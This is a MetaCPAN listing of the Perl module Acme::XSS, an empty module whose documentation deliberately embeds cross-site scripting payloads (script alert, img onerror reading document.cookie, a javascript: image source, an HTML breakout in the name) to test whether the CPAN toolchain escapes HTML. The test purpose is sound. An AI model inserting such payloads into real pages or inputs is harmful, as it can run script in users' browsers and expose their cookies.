Acme-XSS
view release on metacpan or search on metacpan
lib/Acme/XSS.pm view on Meta::CPAN
package Acme::XSS;
use strict;
use warnings;
use 5.013001;
our $VERSION = '0.03';
1;
__END__
=for stopwords xmp XSS
=encoding utf8
=head1 NAME
Acme::XSS - "><xmp>XSS Testing
=head1 SYNOPSIS
use Acme::XSS;
<xmp>
=head1 DESCRIPTION
This is a module to testing CPAN toolchain.
=begin html
<script>alert("all your codes are belongs to us");</script>
<img onerror="javascript:alert(document.cookie);" src="/">
<IMG SRC=javascript:alert('XSS')>
=end html
=head1 AUTHOR
Tokuhiro Matsuno E<lt>tokuhirom AAJKLFJEF GMAIL COME<gt>
=head1 SEE ALSO
=head1 LICENSE
Copyright (C) Tokuhiro Matsuno
This library is free software; you can redistribute it and/or modify
it under the same terms as Perl itself.
=cut
( run in 1.876 second using v1.01-cache-2.11-cpan-39bf76dae61 )